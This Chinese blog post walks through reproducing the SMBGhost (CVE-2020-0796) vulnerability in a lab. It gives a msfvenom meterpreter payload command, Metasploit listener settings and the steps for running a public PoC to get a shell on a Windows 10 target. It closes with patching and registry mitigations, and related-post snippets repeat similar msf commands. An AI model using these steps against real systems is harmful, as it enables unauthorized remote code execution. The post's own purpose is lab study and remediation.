cve-2020-0796_永恒之黑:CVE20200796漏洞复现

最新推荐文章于 2024-03-06 22:19:39 发布
最新推荐文章于 2024-03-06 22:19:39 发布
阅读量2.3k 收藏 12
点赞数 3
文章标签: cve-2020-0796 永恒之蓝漏洞原理 445

1f9eea3dd0753da6b88ce124d1ea9cc5.png

2017年,“永恒之蓝”,

3年之后,

“永恒之黑” 来了。

漏洞介绍

3月12日, 微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒之黑”。

本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒之黑一旦被成功利用,其危害不亚于永恒之蓝。


同时,CVE-2020-0796漏洞与“永恒之蓝”系列漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。 漏洞危害等级:高危 “永恒之黑”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。 漏洞影响范围 Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)

漏洞复现

想要复现这个永恒之黑,大家可以搭建靶机来完成,如下所示:

1、环境准备

Win10 靶机:192.168.183.133

Kali 攻击机192.168.183.136

一定要记住:关闭防火墙,关闭防火墙,关闭防火墙!!!

2、查看环境情况

Windows版本,按win+r,在弹出窗口中,输入 winver

bbaa4b7f4e8f426b1ccdea7b21881724.png

3、使用SMBGhost工具检测靶机是否存在漏洞

SMBGhost下载地址:https://github.com/ollypwn/SMBGhost

9f4cc8853160d7cc1304f8030737f87f.png

4、使用蓝屏payload,验证漏洞

蓝屏POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

演示:蓝屏

fde4385656fc9db4543a2078a9deb266.png

09159e70760b7d5ce840f3f7047c6e67.png以上的步骤成功证明漏洞存在。

5、利用msf生成exp反弹shell

msfvenom -p windows/x64/meterpreter/bind_tcpLPORT=4444 -b '\x00' -i 1 -f python>exploit

打开蓝屏POC 的exploit.py 文件将生成的 USER_PAYLOAD 替换为生成的exp

(注意:buf 要替换为 USER_PAYLOAD)

c2ba041e4d9870e7df5af1cfc84c8c05.png

蓝屏POC exploit 实况图

43b167d92fdd0d479729f1ada8027e2c.png

Msf生成exp实况图

9bada876efa0e8ec4c8a14e7960600ef.png

修改exploit.py 文件 实况图

6、设置msf监听

use payload windows/x64/meterpreter/bind_tcpset lport  监听端口Set rhost  目标ip

af4bf72fc2ce92fa33e920c56b39ab52.png

run/exploit 执行监听

7、运行修改之后的exp

python3 exploit.py  -ip  目标ip

e0530bd355aaa29b3a6fc1af128cba02.png

成功反弹meterpreter,执行shell命令查看IP地址为win10机器地址

479d52c7d18ab0d6314331a5294e79a0.png

漏洞修复

1、更新系统、完成补丁的安装:
操作步骤:设置->更新和安全->Windows更新,点击“检查更新”。 2、不更新系统的临时应对方法:
运行regedit.exe,打开注册表编辑器,在HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters建立一个名为DisableCompression的DWORD,值为1,禁止SMB的压缩功能。 3、封禁SMB通信445端口。 永恒之蓝复现: MS17-010漏洞回顾 END

信安客旨在培养网络安全人才,分享安全行业最新动态、技术交流、等保相关标准等。

b2257772143367671ce76bad7928a9f2.png

weixin_39826809
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-0796漏洞
Jinmindong
03-29 768
CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的;在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码,该漏洞类似于永恒之蓝。漏洞危害等级:高。
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4679
win10系统攻击msf
漏洞CVE-2020-0796永恒之漏洞
qq_45244158的博客
03-29 1万+
文章目录一、漏洞描述二、影响版本三、漏洞检测四、漏洞环境五、(1)漏洞利用之蓝屏五、(2)漏洞利用之本地提权五、(3)漏洞利用之反弹shell1、使用msfvenom生成payload2、替换payload3. 开启msf监听模块4. 运行exploit.py脚本,发起攻击反弹shell5. 执行成功,查看监听的地方,成功得到shell六、修建议1.安装官方补丁2.禁用SMBv3压缩3.设置防火墙策略关闭相关端口4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务 一、漏洞描述.
cve-2020-0796_CVE20200796 漏洞(rce)
weixin_39635657的博客
11-30 394
0X00漏洞简介Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。微软公布了在Server Messag...
CVE-2022-26809:Windows 远程代码执行漏洞,约72万台服务器端口暴露外网
anquanjishu的博客
04-15 1862
微软上周修了一个Windows RPC CVE-2022-26809 漏洞,并将其评为「严重」级别,无需身份认证和用户交互,仅通过向受影响的目标服务器发送特制的RPC请求,即可触发并达到远程代码执行的目的。 受影响范围 从上表中可以看出来,此漏洞利用无需要交互。基本上暴露了445端口且运行了Windows RPC未安装补丁的Windows 服务器都容易受到攻击。据Shodan统计称,网上暴露445端口的服务器超过70万台,如图所示: 漏洞详情: 漏洞位于Win...
SMB-2
H2SO2的专栏
05-14 1330
Samba服务工作原理Samba服务工作原理Samba服务的具体工作过程如图所示。① 首先客户端发送一个SMB negprot请求数据报,并列出它所支持的所有SMB协议版本。服务器收到请求信息后响应请求,并列出希望使用的协议版本。如果没有可使用的协议版本则返回0XFFFFH,结束通信。② 协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SesssetupX请求
CVE-2020-0796_SMBGhost_RCE_exp.zip
06-05
CVE-2020-0796_SMBGhost_RCE_exp.zip CVE-2020-0796 exp
CVE-2020-0796 POC 永恒之 POC SMBGhost POC
10-15
CVE-2020-0796 POC 利用SMBv3远程代码执行漏洞 POC 永恒之 POC SMBGhost POC 建议用户及时使用POC自查,如存在漏洞及时进行安全加固
CVE-2020-0688_EXP:CVE-2020-0688_EXP自动触发有效载荷和加密方法
03-20
CVE-2020-0688_EXP CVE-2020-0688_EXP自动触发有效载荷 python3 CVE-2020-0688_EXP.py -h usage: CVE-2020-0688_EXP.py [-h] -s SERVER -u USER -p PASSWORD -c CMD [-e] optional arguments: -h, --help show ...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-0796永恒之漏洞 超详细过程(成功
unlash的博客
10-20 5108
CVE-2020-0796永恒之漏洞 超详细过程 成功 msf监听成功反弹shell 漏洞描述 影响版本 修建议
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4142
一次MSF模拟渗透测试攻击window实例
CVE-2020-0796(基于kali实
最新发布
m0_74988425的博客
03-06 1260
本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。然而,在这里使用的是`bind_tcp`,它不需要指定远程主机,因此在这种情况下,这个命令没有实际效果。CVE-2020-0796是指影响微软Windows 10和Windows Server 2019的一个漏洞,通常被称为"SMBGhost"或"CoronaBlue"。2. 网络分段: 将网络分为不同的区域,将不同的系统放置在不同的网络中。
kali攻击命令大全_利用msf攻击win10
热门推荐
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
windows10 远程代码执行漏洞CVE-2020-0796)
键盘上温暖而又美好的时光
05-20 2408
漏洞描述 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 漏洞危..
cve-2020-0796_【CVE20200796】漏洞
weixin_39644139的博客
11-30 613
一、漏洞简介该漏洞是服务器消息块3.1.1(SMBv3)协议中处理压缩消息时,对数据没有经过安全检查,直接使用会引发内存破坏,成功利用针对此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器,若要利用针对客户端的漏洞,未经身份验证的攻击者需要配置恶意SMBv3服务器,并诱使用户连接到该服务器。二、...
windows10 永恒之CVE-2020-0796)
qq_53579360的博客
11-13 1474
永恒之
msf win10漏洞_永恒之CVE20200796漏洞
05-28
这不是一个问题,而是一个主题。如果您想要了解如何 CVE-2020-0796(也称为“永恒之漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。 其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。 最后,您可以按照以下步骤进行CVE-2020-0796漏洞: 1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。 2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置: set RHOSTS [目标IP地址] set RPORT 445 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [攻击机IP地址] 3. 运行exploit命令,进行漏洞利用。 请注意,上述操作仅供学习和研究目的,不得用于非法攻击和侵犯他人隐私。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值